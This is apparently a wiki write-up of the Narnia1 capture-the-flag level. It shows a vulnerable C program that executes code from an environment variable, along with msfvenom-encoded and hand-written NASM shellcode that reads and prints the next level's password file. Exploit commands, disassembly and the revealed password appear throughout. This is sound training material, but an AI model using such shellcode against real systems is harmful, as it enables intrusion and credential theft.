Narnia1 - narnia2

From JaxHax
Jump to: navigation, search

Code

//narnia1@melinda:/narnia$ cat narnia1.c 
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
 
int main(){
	int (*ret)();
 
	if(getenv("EGG")==NULL){    
		printf("Give me something to execute at the env-variable EGG\n");
		exit(1);
	}
 
	printf("Trying to execute EGG!\n");
	ret = getenv("EGG");
	ret();
 
	return 0;
}


Solution

so this code will just execute any shellcode in the shell environment variable EGG... This is like a shellcode tester. I guess the point is to teach people how to use shellcode and enviroment variables? Either way this one is simple. We first must generate shellcode. For this, I'm lazy, and just used msfvenom on my local machine.

$ sudo msfvenom -b '\x00' -p linux/x86/exec CMD="cat /etc/narnia_pass/narnia2" -f python
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 91 (iteration=0)
buf =  ""
buf += "\xb8\x8f\x21\xc1\x8c\xdb\xdc\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x11\x31\x47\x12\x03\x47\x12\x83\x48\x25\x23"
buf += "\x79\x3c\x2d\xfb\x1b\x92\x57\x93\x36\x71\x11\x84\x21"
buf += "\x5a\x52\x23\xb2\xcc\xbb\xd1\xdb\x62\x4d\xf6\x4e\x92"
buf += "\x50\xf9\x6e\x62\x08\x98\x1a\x42\xe1\x3f\x97\xe1\xd2"
buf += "\xd1\x36\x97\x42\x47\xd8\x08\xeb\xf6\x69\xc5\x24\x97"
buf += "\xec\x5b\x55\x0e\x8e\xa9\xa9\x87\x03\x44\x48\xea\x24"


So now we just need to:

  • format this into a string
  • convert that to hex
  • load into EGG and export
  • and run our program
narnia1@melinda:/narnia$ export EGG=$( echo -ne "\xb8\x8f\x21\xc1\x8c\xdb\xdc\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x11\x31\x47\x12\x03\x47\x12\x83\x48\x25\x23\x79\x3c\x2d\xfb\x1b\x92\x57\x93\x36\x71\x11\x84\x21\x5a\x52\x23\xb2\xcc\xbb\xd1\xdb\x62\x4d\xf6\x4e\x92\x50\xf9\x6e\x62\x08\x98\x1a\x42\xe1\x3f\x97\xe1\xd2\xd1\x36\x97\x42\x47\xd8\x08\xeb\xf6\x69\xc5\x24\x97\xec\x5b\x55\x0e\x8e\xa9\xa9\x87\x03\x44\x48\xea\x24");
 
narnia1@melinda:/narnia$ /narnia/narnia1
Trying to execute EGG!
nairiepecu


That works... I also decided to just write some nasm for a payload as well.

;$ cat narina1.asm 
global _start
 
_start:
	jmp _there
_here:
 
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; open(ptrToString, Readonly)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 5
	pop ebx
	xor ecx,ecx
	int 0x80
 
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Read(fd, buffer, buffersize)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	mov ebx, eax  ; Move the file descriptor to ebx
;	sub esp, 50   ; Give some space on the stack
	xor eax, eax
	mov al, 3
	mov ecx, esp
	xor edx, edx
	mov dl, 50
	int 0x80
 
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Write()
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	mov al, 4
	xor ebx, ebx
	inc ebx
	int 0x80
 
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; exit
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 1
	xor ebx, ebx
	int 0x80
 
_there:
	call _here
	db '/etc/narnia_pass/narnia2'


build and extract them using some of my scripts.

$ ./buildnasm.sh narina1.asm 
 
 [*] Compiling narina1.asm with NASM...Done!
 [*] Linking the object file with ld...Done!
 [*] Removing Object file narina1.o...Done!
 [*] Done Son!
 
$ ./extract_shellcode.sh narina1
 
..::[ NASM Shellcode Extractor ]::..
 
-=[ Object Dump ]=-
 
Disassembly of section .text:
08048060 <_start>:
 8048060:	eb 26                	jmp    8048088 <_there>
08048062 <_here>:
 8048062:	31 c0                	xor    %eax,%eax
 8048064:	b0 05                	mov    $0x5,%al
 8048066:	5b                   	pop    %ebx
 8048067:	31 c9                	xor    %ecx,%ecx
 8048069:	cd 80                	int    $0x80
 804806b:	89 c3                	mov    %eax,%ebx
 804806d:	31 c0                	xor    %eax,%eax
 804806f:	b0 03                	mov    $0x3,%al
 8048071:	89 e1                	mov    %esp,%ecx
 8048073:	31 d2                	xor    %edx,%edx
 8048075:	b2 32                	mov    $0x32,%dl
 8048077:	cd 80                	int    $0x80
 8048079:	b0 04                	mov    $0x4,%al
 804807b:	31 db                	xor    %ebx,%ebx
 804807d:	43                   	inc    %ebx
 804807e:	cd 80                	int    $0x80
 8048080:	31 c0                	xor    %eax,%eax
 8048082:	b0 01                	mov    $0x1,%al
 8048084:	31 db                	xor    %ebx,%ebx
 8048086:	cd 80                	int    $0x80
08048088 <_there>:
 8048088:	e8 d5 ff ff ff       	call   8048062 <_here>
 804808d:	2f                   	das    
 804808e:	65 74 63             	gs je  80480f4 <_there+0x6c>
 8048091:	2f                   	das    
 8048092:	6e                   	outsb  %ds:(%esi),(%dx)
 8048093:	61                   	popa   
 8048094:	72 6e                	jb     8048104 <_there+0x7c>
 8048096:	69 61 5f 70 61 73 73 	imul   $0x73736170,0x5f(%ecx),%esp
 804809d:	2f                   	das    
 804809e:	6e                   	outsb  %ds:(%esi),(%dx)
 804809f:	61                   	popa   
 80480a0:	72 6e                	jb     8048110 <_there+0x88>
 80480a2:	69                   	.byte 0x69
 80480a3:	61                   	popa   
 80480a4:	32                   	.byte 0x32
 
-=[ Extracted Shellcode (Length: 69) ]=-
 
\xeb\x26\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd5\xff\xff\xff\x2f\x65\x74\x63\x2f\x6e\x61\x72\x6e\x69\x61\x5f\x70\x61\x73\x73\x2f\x6e\x61\x72\x6e\x69\x61\x32


The above is made to read the password file, print it, and quit.

narnia1@melinda:/narnia$ export EGG=$( echo -ne "\xeb\x26\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd5\xff\xff\xff\x2f\x65\x74\x63\x2f\x6e\x61\x72\x6e\x69\x61\x5f\x70\x61\x73\x73\x2f\x6e\x61\x72\x6e\x69\x61\x32"); 
 
narnia1@melinda:/narnia$ /narnia/narnia1; echo
Trying to execute EGG!
nairiepec